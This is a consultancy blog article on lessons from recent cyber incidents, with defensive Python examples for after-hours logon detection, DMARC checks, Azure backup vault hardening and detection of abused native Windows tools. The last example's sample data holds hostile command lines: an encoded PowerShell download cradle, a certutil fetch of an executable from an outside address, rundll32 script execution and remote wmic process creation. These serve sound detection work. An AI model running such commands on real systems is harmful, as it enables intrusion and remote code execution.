In light of recent high-profile cyber attacks, I’ve been reflecting on how the lessons from cyber incidents highlight the urgent need to rethink our cybersecurity strategies. The patterns emerging from these incidents, such as data exfiltration and sophisticated phishing schemes, reveal critical vulnerabilities in many organisations.
From the importance of multi-factor authentication to the need for better integration of security solutions, the lessons are clear.
In this article, I’ll share the key takeaways and offer actionable insights to help you strengthen your defences and stay ahead of evolving threats.
What lessons have we learned from recent cyber incidents?
The vast majority of publicly reported large-scale cyber attacks, in the UK and globally, have involved data exfiltration. Many began with impersonation via phishing campaigns and highly targeted activity.
Allegedly, the cyber attacks on the London NHS involved third-party services where multi-factor authentication (MFA) may not have been enforced. In other attacks, initial access was gained with credentials harvested late in the working day, which led to out-of-hours activity and account privilege elevations that were not detected.
The cyber attacks on Microsoft Corporation involved Business Email Compromise (BEC) and impersonation.
So what have we learned?
We need to challenge our existing posture, monitoring, processes and analytical rules against the above knowledge to understand how we would perform.
User awareness training, whilst part of continual cybersecurity improvement, also needs to reflect how an attack chain evolves after the initial foothold, and what additional detections of unexpected activity (for example, an out-of-hours logon from a new location followed by a privilege change on the same account) should be implemented.
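To make that detection concrete, here is an added example (my own illustration, not code or telemetry from the original article) of the analytical rule the pattern above calls for: correlate an account's business-hours use with anything it does out of hours, and raise the severity when the after-hours activity is a privilege change or comes from a source address never seen during the day. The events, the 07:00 to 19:00 working pattern and the event names in `ELEVATION_EVENTS` are all constructed assumptions; map them to your own identity provider's sign-in and audit logs.

```python
from datetime import datetime, time, timedelta

# Constructed sample events (not real logs). "bob" represents an account whose
# credentials were harvested during the working day and reused after hours
# from a new source address, followed by a role assignment and a mailbox rule.
SAMPLE_EVENTS = [
    {"ts": "2024-06-03T09:12:00", "user": "alice", "event": "logon", "src": "10.0.1.20"},
    {"ts": "2024-06-03T17:40:00", "user": "alice", "event": "logoff", "src": "10.0.1.20"},
    {"ts": "2024-06-03T10:05:00", "user": "bob", "event": "logon", "src": "10.0.1.31"},
    {"ts": "2024-06-03T16:55:00", "user": "bob", "event": "logon", "src": "10.0.1.31"},
    {"ts": "2024-06-03T22:47:00", "user": "bob", "event": "logon", "src": "203.0.113.9"},
    {"ts": "2024-06-03T22:53:00", "user": "bob", "event": "role_assigned", "src": "203.0.113.9",
     "detail": "Global Administrator"},
    {"ts": "2024-06-03T23:10:00", "user": "bob", "event": "inbox_rule_created", "src": "203.0.113.9",
     "detail": "forward to external"},
]

# Assumed working pattern: Monday to Friday, 07:00 to 19:00 local time.
BUSINESS_START = time(7, 0)
BUSINESS_END = time(19, 0)
# Assumed event names that change what an account can do; treat these as elevation.
ELEVATION_EVENTS = {"role_assigned", "group_membership_added", "consent_granted"}


def in_business_hours(dt: datetime) -> bool:
    return dt.weekday() < 5 and BUSINESS_START <= dt.time() < BUSINESS_END


def detect_after_hours_activity(events, window_hours: int = 24):
    """Flag after-hours events by accounts that were used during business hours
    within the preceding window, when the event comes from a source not seen
    during the day or is a privilege change. Returns a list of findings."""
    findings = []
    daytime_logons = {}  # user -> [(datetime, src)] seen in business hours
    for ev in sorted(events, key=lambda e: e["ts"]):
        dt = datetime.fromisoformat(ev["ts"])
        user = ev["user"]
        if in_business_hours(dt):
            if ev["event"] == "logon":
                daytime_logons.setdefault(user, []).append((dt, ev["src"]))
            continue
        recent = [(t, s) for t, s in daytime_logons.get(user, [])
                  if timedelta(0) <= dt - t <= timedelta(hours=window_hours)]
        if not recent:
            continue  # no recent daytime use of this account to correlate with
        new_source = ev["src"] not in {s for _, s in recent}
        elevation = ev["event"] in ELEVATION_EVENTS
        if not (new_source or elevation):
            continue  # after-hours work from the usual device is not, alone, suspicious
        findings.append({
            "user": user,
            "ts": ev["ts"],
            "event": ev["event"],
            "src": ev["src"],
            "severity": "high" if elevation else "medium",
            "reason": ("privilege change after hours" if elevation
                       else "after-hours activity from a source not seen during the day"),
        })
    return findings


if __name__ == "__main__":
    for f in detect_after_hours_activity(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['ts']} {f['user']} {f['event']} from {f['src']}: {f['reason']}")
```

Run against the constructed events, the rule stays silent for alice and produces three findings for bob: the late logon from the new address, the Global Administrator assignment (high) and the forwarding rule. The point is the correlation, not the individual events: none of bob's after-hours actions is malicious on its own, which is exactly why they were missed in the incidents described above.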
Many security point solutions are not closely integrated, which leaves exploitable gaps, and bad actors do exploit them. In many of the most recent attacks, endpoint security solutions were not closely integrated with network, email and vulnerability management solutions, so indicators seen by one were never correlated with the others.
Scheduling high-severity security updates to be applied within 28 days creates significant opportunities for bad actors, especially when exploitation of a newly disclosed vulnerability is frequently observed within a day of disclosure.
The issue is not only overconfidence; we also need to recognise that the most important metric is earlier visibility of a security issue, with an accompanying response.
We speak with many customers who have enhanced their endpoint security and SIEM solutions but are unsure how to respond to alerts and incidents. Just as with Incident Response, having a plan and reviewing it regularly is crucial for continual improvement.
Why is ransomware still so effective?
Let’s remember that we have made some progress in reducing the effectiveness and prevalence of ransomware. However, our ability to respond needs to improve to keep pace with how quickly bad actors change and adapt.
The basic fact is that bad actors depend on forcing a position where paying a ransom is the easier and cheaper option to regain access to data, or to stop publication of exfiltrated data, or both.
Fundamentally, ransomware remains a simple way to make money illegally, especially as access to powerful ransomware tooling becomes easier (and eliminating that tooling remains challenging).
Ransomware is designed to be highly damaging when combined with data exfiltration, attacking an organisation’s reputation from multiple angles.
Internationally, we are getting more effective at taking down organised entities. However, their ability to reform, unpoliced, in new areas of the dark web, together with the difficulty of tackling some nation-state-sponsored actors, makes policing time-consuming and challenging across some borders.
As organisations have become more effective at faster business recovery, the emphasis has shifted to publication of exfiltrated data as the main lever.
Bad actors are more targeted, and instil fear and panic in victims using increasingly aggressive tactics. They often issue payment links which are themselves infected with additional malware, and use intimidating messages and threats to life, as well as targeting family members. Involving family members increases the emotional pressure.
Vulnerabilities are continually identified; some present high levels of business risk and need to be resolved quickly.
Attackers are highly automated and targeted at exploiting these weaknesses within hours of identification. Ask yourself how fast your organisation updates devices in response to critical or high-severity vulnerabilities.
We have to adapt and protect in the same timescales to reduce exploitation opportunities.
Whilst the overconfidence dilemma may not take into account human error or deception by sophisticated phishing attacks, email-borne data exfiltration has remained in the top three causes for the last 15 years.
How many organisations truly review phishing metrics to understand how best to improve phishing protection for the most targeted or vulnerable users and processes?
Over a third of organisations know that enforcing DMARC (backed by SPF and DKIM) reduces the effectiveness of phishing, because the sender domain must then be validated and aligned. Yet many only publish SPF or DKIM records and a monitoring-only DMARC record (p=none), without an enforcing policy (p=quarantine or p=reject). Receivers then validate and score the message but take no action, so the record has no protective effect.
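The following Python is an added example (not code from the original article) of the check implied above: parse a domain's `_dmarc` TXT record and classify it as missing, invalid, monitor-only, partially enforcing or enforcing. The records and domain names are constructed here rather than looked up; in practice you would feed it the TXT values returned by your resolver for `_dmarc.<domain>`.

```python
# Constructed DMARC TXT records for illustration (not real DNS lookups).
CONSTRUCTED_RECORDS = {
    "example.com": "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com",
    "example.net": "v=DMARC1; p=reject; sp=reject; pct=100; adkim=s; aspf=s; rua=mailto:dmarc@example.net",
    "example.org": "v=DMARC1; p=quarantine; pct=10; rua=mailto:dmarc@example.org",
    "example.edu": "v=DMARC1; p=reject; sp=none",
    "example.co.uk": None,  # no _dmarc TXT record published at all
}

# Policies that actually change what a receiver does with failing mail.
ENFORCING = {"quarantine", "reject"}


def parse_dmarc(txt: str) -> dict:
    """Split 'tag=value; tag=value' into a dict; tag names are case-insensitive."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags


def assess_dmarc(txt):
    """Return (status, explanation) for one _dmarc TXT value (None = no record)."""
    if not txt:
        return "missing", "no DMARC record: receivers apply no domain policy"
    tags = parse_dmarc(txt)
    if tags.get("v", "").upper() != "DMARC1" or "p" not in tags:
        return "invalid", "record must carry v=DMARC1 and a p= tag"
    p = tags["p"].lower()
    sp = tags.get("sp", p).lower()  # subdomain policy defaults to the domain policy
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        return "invalid", "pct must be an integer"
    if p == "none":
        return "monitor_only", "p=none only requests reports; failing mail is still delivered"
    if p not in ENFORCING:
        return "invalid", f"unknown policy {p!r}"
    if sp not in ENFORCING:
        return "partial", f"organisational domain enforces {p} but subdomains are sp={sp}"
    if pct < 100:
        return "partial", f"only {pct}% of failing mail is subject to {p}"
    return "enforcing", f"p={p} applied to all failing mail, subdomains sp={sp}"


if __name__ == "__main__":
    for domain, record in CONSTRUCTED_RECORDS.items():
        status, why = assess_dmarc(record)
        print(f"{domain:15} {status:13} {why}")
```

Two of the constructed records look enforced at a glance but are not: `example.org` applies quarantine to only 10% of failing mail (a legitimate ramp-up stage, but not a finished deployment), and `example.edu` rejects for the organisational domain while leaving every subdomain unprotected with `sp=none`. The target state is `p=reject`, `sp=reject` and `pct=100`, reached only after the reports from a `p=none` period confirm that all legitimate senders pass SPF or DKIM alignment.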
How do you respond to suspected data exfiltration?
The first question most leadership teams ask is: what have they got?
It is often not an easy question to answer quickly, yet the pressure to know is immense. Many bad actors will also claim to hold a large amount of data when that may not be the case.
This is part of increasing the pressure. Attackers can also tell whether data is tagged or classified. A business’s confidence comes from knowing whether the data was detected as it left and exactly what has been exfiltrated.
Attackers will be evasive and may at some point post a sample of exfiltrated data. It is also important to remember that the bad actor demanding payment may not be the party who undertook the exfiltration; multiple bad actors are invariably involved in ransoms.
If a business has tagged and classified its data, it is invariably easier to understand what may have been exfiltrated. It is not easy if data has not been classified or is spread across multiple data services. Where devices are stolen or lost, remote deletion technology.
Can immutable backups be compromised?
Immutable backups cannot be altered: by definition the copies are unchangeable for their retention period, which protects them from ransomware and malware that seeks to encrypt, overwrite or delete backup data or to change its encryption parameters, keys and storage.
You must still protect the immutable backup platform itself, as bad actors are increasingly seeking to change access permissions and privileges to prevent you from recovering from the immutable copies.
Another example is an attacker gaining cloud administrator rights and simply deleting the storage accounts or subscriptions containing the data vaults. In Microsoft Azure, for example, you should enable the immutable vault setting on Backup Recovery Services vaults AND lock it: while the setting is merely enabled, an administrator (or an attacker holding that administrator’s credentials) can switch it off again before deleting recovery points.
Once locked, immutability cannot be reversed. However, you still need to back up the vault’s encryption keys and have processes that guard against insider threats. A disgruntled employee, or an internal administrator with subscription access who is coerced, could still delete the subscription or storage holding the vault, so critical operations on the backup platform should require a second person’s authorisation rather than a single account (in Azure Backup this is multi-user authorization via Resource Guard).
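As an added illustration (my own code, not from the original article), the Python below assesses vault descriptions shaped like the securitySettings block of an Azure Recovery Services vault ARM resource and flags the three conditions discussed above: immutability disabled or left unlocked, soft delete that an administrator can turn off, and no multi-user authorization. The vault JSON is constructed, and the property names (`immutabilitySettings.state`, `softDeleteSettings.softDeleteState`, `multiUserAuthorization`) are my assumption from the ARM schema; compare them with what `az backup vault show` returns for your vaults before relying on the script.

```python
# Constructed vault descriptions (not copied from a real tenant). The property
# names are an assumption based on the Recovery Services vault ARM schema.
CONSTRUCTED_VAULTS = [
    {"name": "rsv-prod-uksouth",
     "properties": {"securitySettings": {
         "immutabilitySettings": {"state": "Locked"},
         "softDeleteSettings": {"softDeleteState": "AlwaysON",
                                "softDeleteRetentionPeriodInDays": 30},
         "multiUserAuthorization": "Enabled"}}},
    {"name": "rsv-dev-ukwest",
     "properties": {"securitySettings": {
         "immutabilitySettings": {"state": "Unlocked"},
         "softDeleteSettings": {"softDeleteState": "Enabled",
                                "softDeleteRetentionPeriodInDays": 14},
         "multiUserAuthorization": "Disabled"}}},
    {"name": "rsv-legacy",
     "properties": {"securitySettings": {}}},  # nothing configured at all
]


def assess_vault(vault: dict) -> list:
    """Return a list of (severity, finding) tuples; an empty list means hardened."""
    settings = vault.get("properties", {}).get("securitySettings", {})
    findings = []

    # Immutability: Disabled (default) < Unlocked (reversible) < Locked (irreversible).
    imm = settings.get("immutabilitySettings", {}).get("state", "Disabled")
    if imm == "Disabled":
        findings.append(("high", "immutability disabled: recovery points can be deleted or shortened"))
    elif imm == "Unlocked":
        findings.append(("high", "immutability enabled but not locked: an administrator can switch it "
                                 "off again before deleting"))

    # Soft delete: AlwaysON is the only state a vault administrator cannot revert.
    sd = settings.get("softDeleteSettings", {})
    state = sd.get("softDeleteState", "Disabled")
    if state == "Disabled":
        findings.append(("high", "soft delete disabled: deleted backup data is gone immediately"))
    elif state != "AlwaysON":
        findings.append(("medium", "soft delete can be turned off by a vault administrator; "
                                   "AlwaysON prevents that"))

    # Multi-user authorization: critical operations need a second identity's approval.
    if settings.get("multiUserAuthorization", "Disabled") != "Enabled":
        findings.append(("high", "multi-user authorization not enabled: one compromised or coerced "
                                 "administrator can perform critical vault operations alone"))
    return findings


def is_hardened(vault: dict) -> bool:
    return assess_vault(vault) == []


def report(vaults) -> dict:
    """Map vault name to its findings, for all vaults in a subscription export."""
    return {v["name"]: assess_vault(v) for v in vaults}


if __name__ == "__main__":
    for name, findings in report(CONSTRUCTED_VAULTS).items():
        print(name, "OK" if not findings else "")
        for sev, text in findings:
            print(f"  [{sev}] {text}")
```

Note what the script cannot see: none of these settings stops a principal with Owner rights on the subscription from deleting the subscription itself. That residual risk is addressed by limiting who holds such rights, by Azure resource locks and by the insider-threat processes described above, not by the vault configuration alone.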
What are common security configuration issues we see?
- Incorrect, expired or wildcard certificates on key public-facing services and protocols
- Email security solutions that are not tuned regularly, or that lack enhanced analytical rules built from the malicious content that has previously evaded detection
- Privileged Azure rights not removed, and accounts of leavers not disabled
- Conflicting Microsoft Entra Conditional Access policies
- No monitoring for mass file extension changes or bulk file movement (classic indicators of encryption in progress or data being staged for exfiltration)
- Absence of updated and tested Incident Response plans
- Weak privileged account passwords that are known to be weak but remain unchanged
- Unrestricted application registration and consent for ordinary users, which can grant an attacker elevated rights through a malicious app
- Over-reliance on MFA as the principal control validating user access (it does not, on its own, stop session token theft or consent phishing)
- Missing or conflicting policies that disable MFA, or never request it, for certain users or groups
- Unpatched vulnerabilities
How do bad actors evade detection in living off the land attacks?
Evasion techniques seek to deceive, divert or masquerade malicious intent while an attacker attempts to gain unauthorised access to a business. In a living off the land attack the attacker uses tools and credentials that are already present (built-in administration utilities, scripting engines, legitimate accounts) so that the activity blends in with normal administration and no new binary is dropped for endpoint tooling to flag.
This initial activity may be through:
- Impersonation attacks, or the compromise or use of harvested credentials
- Exploitation of identified but unpatched vulnerabilities to gain unauthorised access
- Malware or malicious code that creates rogue connections, accounts or privileges in order to scan and move through an environment
- Malware installed via browser plugins or bots that collect activity-tracking insights and information
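Because living off the land leaves no malicious binary to detect, the practical control is command-line inspection of otherwise legitimate processes. The following is an added example (my own code, not from the original article) that matches constructed process-creation events against a small set of native-tool abuse patterns, and decodes PowerShell `-EncodedCommand` arguments before matching so that base64 does not hide a download cradle. The events, hostnames and addresses are constructed, and the pattern list is illustrative rather than an exhaustive catalogue.

```python
import base64
import re

# Constructed process-creation events (not real telemetry). The encoded
# PowerShell command is generated here so the sample is self-contained.
_HIDDEN = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
_ENCODED = base64.b64encode(_HIDDEN.encode("utf-16le")).decode()

SAMPLE_PROCESSES = [
    {"host": "ws-014", "user": "bob", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"host": "ws-014", "user": "bob", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.9/x.txt C:\\Users\\Public\\x.exe"},
    {"host": "ws-014", "user": "bob", "image": "rundll32.exe",
     "cmdline": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write()"},
    {"host": "srv-db1", "user": "svc_backup", "image": "wmic.exe",
     "cmdline": "wmic /node:srv-file1 process call create \"cmd /c whoami\""},
    {"host": "ws-002", "user": "alice", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\printer-map.ps1"},
    {"host": "ws-002", "user": "alice", "image": "certutil.exe",
     "cmdline": "certutil.exe -viewstore -user My"},
]

# (technique name, regex over the full command line) for native tools abused to
# download, decode, execute or move laterally.
LOLBIN_PATTERNS = [
    ("powershell_encoded", re.compile(r"powershell(\.exe)?.*\s-(e|ec|enc|encodedcommand)\s", re.I)),
    ("powershell_download_cradle", re.compile(r"powershell.*(downloadstring|downloadfile|invoke-webrequest|iwr\s)", re.I)),
    ("certutil_download", re.compile(r"certutil(\.exe)?.*-urlcache.*https?://", re.I)),
    ("certutil_decode", re.compile(r"certutil(\.exe)?.*-decode\s", re.I)),
    ("rundll32_script", re.compile(r"rundll32(\.exe)?\s+(javascript|vbscript):", re.I)),
    ("mshta_remote", re.compile(r"mshta(\.exe)?\s+(https?|vbscript|javascript):", re.I)),
    ("wmic_remote_process", re.compile(r"wmic(\.exe)?\s+/node:.*process\s+call\s+create", re.I)),
    ("regsvr32_scriptlet", re.compile(r"regsvr32(\.exe)?.*(/i:|/s).*scrobj\.dll", re.I)),
    ("bitsadmin_transfer", re.compile(r"bitsadmin(\.exe)?.*/transfer.*https?://", re.I)),
]


def decode_encoded_powershell(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_process(event: dict) -> dict:
    """Match one event against the patterns. Any decoded PowerShell is appended to
    the text being scanned, so encoding does not hide the download cradle."""
    cmd = event["cmdline"]
    decoded = decode_encoded_powershell(cmd)
    text = cmd + (" " + decoded if decoded else "")
    hits = [name for name, rx in LOLBIN_PATTERNS if rx.search(text)]
    return {**event, "decoded": decoded, "techniques": hits}


def flag_suspicious(events):
    """Return only the events that matched at least one technique."""
    return [r for r in (analyse_process(e) for e in events) if r["techniques"]]


if __name__ == "__main__":
    for r in flag_suspicious(SAMPLE_PROCESSES):
        print(f"{r['host']} {r['user']} {r['image']}: {', '.join(r['techniques'])}")
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

Against the constructed events, alice's printer-mapping script and certificate store query pass untouched, while bob's three commands and the remote WMI process creation from the service account are flagged, with the encoded PowerShell decoded to reveal the download cradle. In production the same approach belongs in the EDR or SIEM rule set, enriched with parent process, user and time of day, which is where the integration gaps described earlier in this article tend to show.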
How do we prevent future CrowdStrike-like security incidents?
Firstly, events like this are very uncommon, but there is no avoiding the impact this one had globally.
We now know from CrowdStrike that the outage was the result of a bug in the content validation testing process, which failed to identify a further bug in the content update released to all endpoints.
There are still considerable questions as to why testing did not identify the severity of this issue prior to release, but CrowdStrike’s review remains ongoing.
Many other cyber providers already use phased releases, which aim to limit the amplification of serious content issues. There have been millions of content updates across all cybersecurity platforms over the last few decades, and they have overwhelmingly served to improve threat protection and detection.
There are several lessons to be learnt from this episode though.
First, and similar to the way many organisations deploy Operating System updates, releases should be phased, with assurance across the business over a few days rather than delivery to every endpoint at once.
Where security products provide such a feature, or allow release to a test assurance group first, it should be used. If it is not a feature, it should become a product selection criterion at the point of review or renewal.
Ultimately, vendors whose code is permitted to run in Ring 0 (the kernel) need to introduce more extensive testing, because a fault there takes down the whole operating system rather than a single process.
Undoubtedly, vendor selection and assurances, as well as liabilities for failure, will have to be reviewed given the scale of impact this error created.
Independent testing and assurance should be introduced as an intermediary stage, with agreed platforms included, to ensure where possible that an update does not create instabilities or performance issues.
That’s a wrap!
Thank you for taking the time to read this article! We hope these learnings from cyber incidents help you understand how you can better protect your business. If you have any cybersecurity concerns, we offer a range of services to help you strengthen your security measures.
Our offerings include cybersecurity consulting services, security posture assessments, and CISO advisory services. Whether you need to identify vulnerabilities, enhance your security strategy, or receive expert guidance, our team is here to assist you.
Or if you just need some expert advice, we offer no-obligation, 100% confidential cyber clinics. These are free sessions with an expert from our team to help you tackle cybersecurity issues head-on.